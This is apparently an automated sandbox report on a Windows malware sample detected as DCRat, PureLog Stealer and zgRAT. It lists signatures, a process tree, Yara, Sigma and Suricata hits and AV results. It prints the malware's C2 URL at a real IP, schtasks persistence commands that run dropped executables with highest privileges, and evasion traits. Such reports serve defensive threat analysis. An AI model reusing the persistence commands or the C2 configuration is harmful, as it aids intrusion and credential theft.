Edit tour

Windows Analysis Report
Dfim58cp4J.exe

Overview

General Information

Sample name:	Dfim58cp4J.exe renamed because original name is a hash value
Original sample name:	1430af130a1e5556185aa87e6d8d933f.exe
Analysis ID:	1572162
MD5:	1430af130a1e5556185aa87e6d8d933f
SHA1:	4b021c96a33ccb6b032373de33d7c14d9587f74c
SHA256:	030524cc026f8230237b61b5e9142de7db0ddce62212f41f8222ac479d24c1e9
Tags:	exeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Creates processes via WMI

Drops PE files with benign system names

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to detect virtual machines (SLDT)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Dfim58cp4J.exe (PID: 4656 cmdline: "C:\Users\user\Desktop\Dfim58cp4J.exe" MD5: 1430AF130A1E5556185AA87E6D8D933F)

DC.exe (PID: 4220 cmdline: "C:\Users\user\AppData\Local\Temp\DC.exe" MD5: 8E9E5B8DC57C1A495271A7C764BC9520)

wscript.exe (PID: 1292 cmdline: "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

comReviewsvc.exe (PID: 6544 cmdline: "C:\ServerfontSessiondhcpcommon/comReviewsvc.exe" MD5: 53D61BC60C85CB1647B5556C4225FB86)

schtasks.exe (PID: 2796 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5804 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3908 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3944 cmdline: schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 7 /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3132 cmdline: schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxA" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4580 cmdline: schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 5 /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4704 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3628 cmdline: schtasks.exe /create /tn "ApplicationFrameHost" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3916 cmdline: schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 9 /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5688 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6684 cmdline: schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3744 cmdline: schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\ServerfontSessiondhcpcommon\System.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5088 cmdline: schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 996 cmdline: schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxA" /sc ONLOGON /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4132 cmdline: schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6740 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 880 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

System.exe (PID: 2060 cmdline: "C:\ServerfontSessiondhcpcommon\System.exe" MD5: 53D61BC60C85CB1647B5556C4225FB86)

HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe (PID: 6196 cmdline: "C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe" MD5: 53D61BC60C85CB1647B5556C4225FB86)

HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe (PID: 5664 cmdline: "C:\Program Files (x86)\java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe" MD5: 53D61BC60C85CB1647B5556C4225FB86)

System.exe (PID: 5900 cmdline: C:\ServerfontSessiondhcpcommon\System.exe MD5: 53D61BC60C85CB1647B5556C4225FB86)

System.exe (PID: 1860 cmdline: C:\ServerfontSessiondhcpcommon\System.exe MD5: 53D61BC60C85CB1647B5556C4225FB86)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Dfim58cp4J.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ServerfontSessiondhcpcommon\System.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ServerfontSessiondhcpcommon\System.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\DC.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\DC.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\DC.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\DC.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 9 entries

Memory Dumps

Source	Rule	Description	Author
0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.2570123434.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000000.1312124353.0000000000822000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000000.1654892379.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001E.00000002.2570123434.0000000003979000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.1687630200.00000000133DB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: comReviewsvc.exe PID: 6544	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe PID: 6196	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
1.0.Dfim58cp4J.exe.820000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.DC.exe.55d570b.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.DC.exe.55d570b.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.DC.exe.55be70b.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.DC.exe.55be70b.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.0.comReviewsvc.exe.f30000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
8.0.comReviewsvc.exe.f30000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, ProcessId: 6544, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe

Sigma detected: PowerShell Module File Created By Non-PowerShell Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, ProcessId: 6544, TargetFilename: C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DC.exe, ParentProcessId: 4220, ParentProcessName: DC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe" , ProcessId: 1292, ProcessName: wscript.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f, CommandLine: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\ServerfontSessiondhcpcommon/comReviewsvc.exe", ParentImage: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe, ParentProcessId: 6544, ParentProcessName: comReviewsvc.exe, ProcessCommandLine: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f, ProcessId: 2796, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE Single char EXE direct download likely trojan (multiple families)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T07:32:59.711006+0100	2018581	1	A Network Trojan was detected	192.168.2.7	49720	20.233.83.145	443	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T07:33:30.932391+0100	2048095	1	A Network Trojan was detected	192.168.2.7	49797	188.120.227.56	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T07:32:59.711006+0100	2803305	3	Unknown Traffic	192.168.2.7	49720	20.233.83.145	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Dfim58cp4J.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ServerfontSessiondhcpcommon\System.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\wcGwEkbJ.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\fFKZyJVH.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\jlgss9VamV.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\OyuueWqt.log	Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\Desktop\aQQAtfnE.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000008.00000002.1687630200.00000000133DB000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	ReversingLabs: Detection: 87%
Source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	ReversingLabs: Detection: 87%
Source: C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	ReversingLabs: Detection: 87%
Source: C:\ServerfontSessiondhcpcommon\System.exe	ReversingLabs: Detection: 87%
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\DC.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\DRWwxNDB.log	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\GKmeiJoz.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\GQkmowWr.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\MnYteEKs.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\VWrJOgQa.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\aQQAtfnE.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\eIjRcJGM.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\fFKZyJVH.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\nzxGUrLb.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\xRmeReqW.log	ReversingLabs: Detection: 15%

Multi AV Scanner detection for submitted file

Source: Dfim58cp4J.exe	ReversingLabs: Detection: 65%
Source: Dfim58cp4J.exe	Virustotal: Detection: 66%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\VWrJOgQa.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\services.exe	Joe Sandbox ML: detected
Source: C:\ServerfontSessiondhcpcommon\System.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\xRmeReqW.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\wcGwEkbJ.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\GQkmowWr.log	Joe Sandbox ML: detected
Source: C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\DRWwxNDB.log	Joe Sandbox ML: detected
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\OyuueWqt.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Dfim58cp4J.exe

Joe Sandbox ML: detected

Source: Dfim58cp4J.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49704 version: TLS 1.2

Source: Dfim58cp4J.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DC.exe, 00000003.00000003.1412722099.0000000005587000.00000004.00000020.00020000.00000000.sdmp, DC.exe, 00000003.00000003.1412248106.0000000005570000.00000004.00000020.00020000.00000000.sdmp, DC.exe, 00000003.00000000.1411101826.0000000000C03000.00000002.00000001.01000000.00000006.sdmp, DC.exe, 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmp, DC.exe.1.dr

Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BDA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_00BDA69B
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BEC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_00BEC220
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BFB348 FindFirstFileExA,	3_2_00BFB348

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh	8_2_00007FFAAC5BD50D
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 4x nop then jmp 00007FFAAC3F2026h	30_2_00007FFAAC3F1E1E
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh	30_2_00007FFAAC59D50D
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 4x nop then jmp 00007FFAAC96B4D9h	30_2_00007FFAAC96B3E8
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 4x nop then jmp 00007FFAAC96B4D9h	30_2_00007FFAAC96B3D8
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 4x nop then jmp 00007FFAAC402026h	31_2_00007FFAAC401E1E
